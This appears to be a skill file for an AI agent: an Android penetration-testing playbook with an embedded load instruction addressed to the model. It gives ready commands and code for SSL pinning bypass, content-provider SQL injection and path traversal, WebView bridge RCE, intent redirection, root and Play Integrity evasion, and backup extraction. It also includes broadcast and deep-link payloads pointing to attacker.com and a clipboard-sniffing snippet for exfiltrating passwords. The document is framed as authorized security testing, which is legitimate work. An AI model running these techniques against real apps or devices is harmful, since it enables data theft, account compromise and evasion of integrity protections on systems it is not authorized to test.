--- name: android-pentesting-tricks description: >- Android pentesting playbook. Use when testing Android applications for SSL pinning bypass, exported component abuse, WebView vulnerabilities, intent redirection, root detection bypass, tapjacking, and backup extraction during authorized mobile security assessments. --- # SKILL: Android Pentesting Tricks — Expert Attack Playbook > **AI LOAD INSTRUCTION**: Expert Android application security testing techniques. Covers SSL pinning bypass (Frida/Objection/LSPosed), component exposure, WebView exploitation, intent redirection, root detection bypass, and Play Integrity evasion. Base models miss Frida hook specifics and multi-layer bypass chains. ## 0. RELATED ROUTING Before going deep, consider loading: - [mobile-ssl-pinning-bypass](../mobile-ssl-pinning-bypass/SKILL.md) for in-depth cross-platform SSL pinning bypass techniques and framework-specific hooks - [ios-pentesting-tricks](../ios-pentesting-tricks/SKILL.md) when also testing the iOS version of the same app - [api-sec](../api-sec/SKILL.md) for backend API security testing once traffic is intercepted ### Advanced Reference Also load [FRIDA_SCRIPTS.md](./FRIDA_SCRIPTS.md) when you need: - Ready-to-use Frida script templates for common Android testing tasks - Detailed hook points for OkHttp, Retrofit, Volley, WebView - Root detection bypass script collection --- ## 1. SSL PINNING BYPASS ### 1.1 Frida Universal Bypass ```bash # Install Frida server on device adb push frida-server-16.x.x-android-arm64 /data/local/tmp/ adb shell "chmod 755 /data/local/tmp/frida-server-16.x.x-android-arm64" adb shell "/data/local/tmp/frida-server-16.x.x-android-arm64 &" # Universal SSL pinning bypass frida -U -l ssl_pinning_bypass.js -f com.target.app --no-pause ``` | Hook Point | Library/Class | Coverage | |---|---|---| | `X509TrustManager.checkServerTrusted` | Android SDK | All standard HTTPS | | `OkHttpClient.Builder.sslSocketFactory` | OkHttp 3.x/4.x | Square OkHttp | | `CertificatePinner.check` | OkHttp 3.x/4.x | OkHttp pinning | | `HttpsURLConnection.setSSLSocketFactory` | Android SDK | Legacy HTTPS | | `SSLContext.init` | Android SDK | Custom SSL contexts | | `WebViewClient.onReceivedSslError` | WebView | WebView SSL errors | | `TrustManagerFactory.getTrustManagers` | Android SDK | Factory-created TMs | ### 1.2 Objection (Quick Method) ```bash objection -g com.target.app explore # Inside Objection REPL: android sslpinning disable ``` ### 1.3 Network Security Config (Debug Builds) If you can modify the APK or it's a debug build: ```xml

``` ### 1.4 Magisk Module Approach | Module | Method | Scope | |---|---|---| | LSPosed + TrustMeAlready | Hooks system-wide TrustManager | All apps | | LSPosed + SSLUnpinning | Targeted SSL bypass | Per-app | | MagiskTrustUserCerts | Moves user CA to system store | All apps trusting system CAs | | ConscryptTrustUserCerts | Patches Conscrypt | Newer Android (7+) | --- ## 2. COMPONENT EXPOSURE ### 2.1 Exported Activities ```bash # Find exported activities (AndroidManifest.xml or aapt) aapt dump xmltree target.apk AndroidManifest.xml | grep -B 5 "exported.*true" # Launch exported activity directly adb shell am start -n com.target.app/.AdminActivity adb shell am start -n com.target.app/.DeepLinkActivity \ -d "target://callback?token=attacker_token" # With extra data adb shell am start -n com.target.app/.TransferActivity \ --es "amount" "99999" --es "recipient" "attacker" ``` ### 2.2 Content Providers ```bash # Query exposed content providers adb shell content query --uri content://com.target.app.provider/users # SQL injection in content provider adb shell content query --uri "content://com.target.app.provider/users" \ --where "1=1) UNION SELECT sql,2,3 FROM sqlite_master--" # Path traversal in file-providing content provider adb shell content read --uri "content://com.target.app.fileprovider/../../../../etc/hosts" ``` | Provider Type | Attack Vector | Impact | |---|---|---| | Database-backed | SQL injection via `query()` projection/selection | Data leak, auth bypass | | File-backed | Path traversal via URI | Read arbitrary files | | Parcelable | Type confusion in custom Parcelable | Code execution | ### 2.3 Broadcast Receivers ```bash # Send crafted broadcast adb shell am broadcast -a com.target.app.ACTION_UPDATE \ --es "url" "http://attacker.com/malicious.apk" # Ordered broadcast interception (higher priority receiver intercepts first) # Register receiver with higher priority than target to intercept/modify data ``` ### 2.4 Exported Services ```bash # Start/bind to exported service adb shell am startservice -n com.target.app/.BackgroundService \ --es "command" "exfiltrate" # List running services adb shell dumpsys activity services | grep com.target ``` --- ## 3. WEBVIEW VULNERABILITIES ### 3.1 JavaScript Interface RCE (Pre-API 17) ```java // Vulnerable code: addJavascriptInterface without @JavascriptInterface annotation webView.addJavascriptInterface(new JSInterface(), "android"); // Pre-API 17: Reflection-based RCE via injected JavaScript // Inject into WebView: // android.getClass().forName('java.lang.Runtime') // .getMethod('getRuntime').invoke(null).exec('id') ``` ### 3.2 Modern WebView Attacks | Vulnerability | Condition | Exploit | |---|---|---| | `setJavaScriptEnabled(true)` + untrusted content | JS enabled + attacker controls loaded URL | XSS → bridge access | | `setAllowFileAccessFromFileURLs(true)` | file:// can read other file:// | Load `file:///data/data/com.target/...` | | `setAllowUniversalAccessFromFileURLs(true)` | file:// can access any origin | Exfiltrate via XHR to attacker | | `loadUrl(user_controlled)` | User input in loadUrl | javascript: scheme or file:// | | `shouldOverrideUrlLoading` bypass | Incomplete URL validation | Redirect to attacker-controlled page | | `evaluateJavascript` with tainted data | User data in JS execution | XSS in WebView context | ### 3.3 Deep Link to WebView Chain ``` 1. Attacker crafts deep link: target://webview?url=https://attacker.com/xss.html 2. App opens WebView with attacker URL 3. XSS in WebView calls JavaScript bridge: android.sensitiveMethod() 4. Bridge executes in app context with app's permissions ``` --- ## 4. INTENT REDIRECTION Exported activity receives an Intent and starts another (internal) activity using data from the received Intent. ```java // Vulnerable pattern: Intent received = getIntent(); Intent redirect = (Intent) received.getParcelableExtra("next_intent"); startActivity(redirect); // Attacker controls "next_intent" → can start any internal activity ``` ```bash # Exploit: start non-exported internal activity via redirection adb shell am start -n com.target.app/.ExportedActivity \ --es "next_intent" "intent:#Intent;component=com.target.app/.InternalAdminActivity;end" ``` | Pattern | Indicator | Risk | |---|---|---| | `getParcelableExtra` → `startActivity` | Intent-in-Intent | Start non-exported activities | | `getStringExtra("url")` → `startActivity(Intent.ACTION_VIEW)` | URL forwarding | Open arbitrary URLs | | `getStringExtra("class")` → `Class.forName` → `startActivity` | Dynamic class loading | Start any activity by name | --- ## 5. ROOT DETECTION BYPASS ### 5.1 Common Root Detection Checks | Check | What It Detects | Frida Bypass | |---|---|---| | `su` binary exists | `/system/xbin/su`, `/sbin/su` | Hook `File.exists()` → return false | | Build tags contain "test-keys" | `Build.TAGS` | Hook `Build.TAGS` → return "release-keys" | | Magisk Manager installed | Package name check | Hook `PackageManager.getPackageInfo` | | Superuser.apk present | Su management app | Hook `File.exists()` | | RootBeer library | Multi-check root detection | Hook all RootBeer check methods | | SafetyNet/Play Integrity | Server-side attestation | Requires Magisk DenyList + module | | Abnormal system properties | `ro.debuggable=1`, etc. | Hook `SystemProperties.get` | ### 5.2 Magisk DenyList (Previously MagiskHide) ```bash # Enable DenyList in Magisk Manager # Add target app to DenyList — Magisk hides itself from that app # Covers: su binary, Magisk Manager package, mount points, props ``` --- ## 6. PLAY INTEGRITY / SAFETYNET BYPASS | Level | What It Checks | Bypass Difficulty | |---|---|---| | Basic Integrity | Not rooted, not emulator | Easy (Magisk + DenyList) | | Device Integrity | Bootloader locked, verified boot | Hard (requires locked bootloader) | | Strong Integrity | Hardware-backed attestation | Very hard (hardware TEE) | Techniques: - Magisk with Zygisk enabled + DenyList for target app - Play Integrity Fix (PIF) Magisk module: spoofs device fingerprint - Shamiko module: hides root from specific apps - Custom ROM with locked bootloader (Pixel-specific tricks) --- ## 7. TAPJACKING (OVERLAY ATTACKS) ```xml ``` | Android Version | Protection | Bypass | |---|---|---| | Pre-6.0 | None | Full overlay | | 6.0–11 | `filterTouchesWhenObscured` (opt-in) | Apps not using it are vulnerable | | 12+ | Untrusted touches blocked for overlay windows | Partial overlays, timing-based | --- ## 8. BACKUP EXTRACTION ```bash # Check if backup allowed aapt dump xmltree target.apk AndroidManifest.xml | grep allowBackup # android:allowBackup(0x01010280)=(type 0x12)0xffffffff → true (default!) # Extract backup adb backup -f backup.ab -apk com.target.app # Convert to tar dd if=backup.ab bs=24 skip=1 | openssl zlib -d > backup.tar tar xf backup.tar # Analyze extracted data find com.target.app -name "*.db" -o -name "*.xml" -o -name "*.json" # Check shared_prefs/ for tokens, credentials # Check databases/ for SQLite DBs with sensitive data ``` --- ## 9. ADDITIONAL TRICKS ### 9.1 Debuggable App Exploitation ```bash # If android:debuggable="true" in manifest adb shell run-as com.target.app # Now running as the app's user — full data directory access cat /data/data/com.target.app/shared_prefs/*.xml ``` ### 9.2 Drozer (Component Testing Framework) ```bash # List attack surface dz> run app.package.attacksurface com.target.app # Exported Activities: 3 # Exported Services: 1 # Exported Providers: 2 # Query provider dz> run app.provider.query content://com.target.app.provider/users # Scan for injection dz> run scanner.provider.injection -a com.target.app ``` ### 9.3 Clipboard Sniffing ```java // Pre-Android 10: any app can read clipboard ClipboardManager cm = (ClipboardManager) getSystemService(CLIPBOARD_SERVICE); cm.addPrimaryClipChangedListener(() -> { ClipData data = cm.getPrimaryClip(); // Exfiltrate copied passwords, tokens, etc. }); ``` --- ## 10. ANDROID PENTESTING DECISION TREE ``` Testing Android application │ ├── Can intercept HTTPS traffic? │ ├── No → SSL pinning in place │ │ ├── Frida available? → universal SSL bypass script (§1.1) │ │ ├── Rooted + Magisk? → LSPosed + TrustMeAlready (§1.4) │ │ ├── Debug build? → Network Security Config (§1.3) │ │ └── None above? → manual decompile + patch + repackage │ └── Yes → proceed to traffic analysis │ ├── Exported components found? │ ├── Exported Activities → test direct launch, deeplink abuse (§2.1) │ ├── Content Providers → SQLi, path traversal (§2.2) │ ├── Broadcast Receivers → crafted intent injection (§2.3) │ └── Services → unauthorized service binding (§2.4) │ ├── WebView present? │ ├── JavaScript enabled + JS interface? → bridge exploitation (§3.1) │ ├── File access enabled? → file:// scheme abuse (§3.2) │ └── Deep link → WebView? → URL injection chain (§3.3) │ ├── Intent handling found? │ └── Intent-in-Intent pattern? → redirect to internal activity (§4) │ ├── Root detection blocking testing? │ ├── Client-side checks only? → Frida hook bypass (§5.1) │ ├── SafetyNet/Play Integrity? → Magisk DenyList + modules (§6) │ └── Custom obfuscated checks? → reverse engineer + targeted hooks │ ├── Sensitive data storage? │ ├── allowBackup=true? → ADB backup extraction (§8) │ ├── Debuggable? → run-as for direct data access (§9.1) │ └── SharedPreferences → check for plaintext tokens/credentials │ └── UI-based attacks applicable? └── Overlay possible? → tapjacking (§7) ```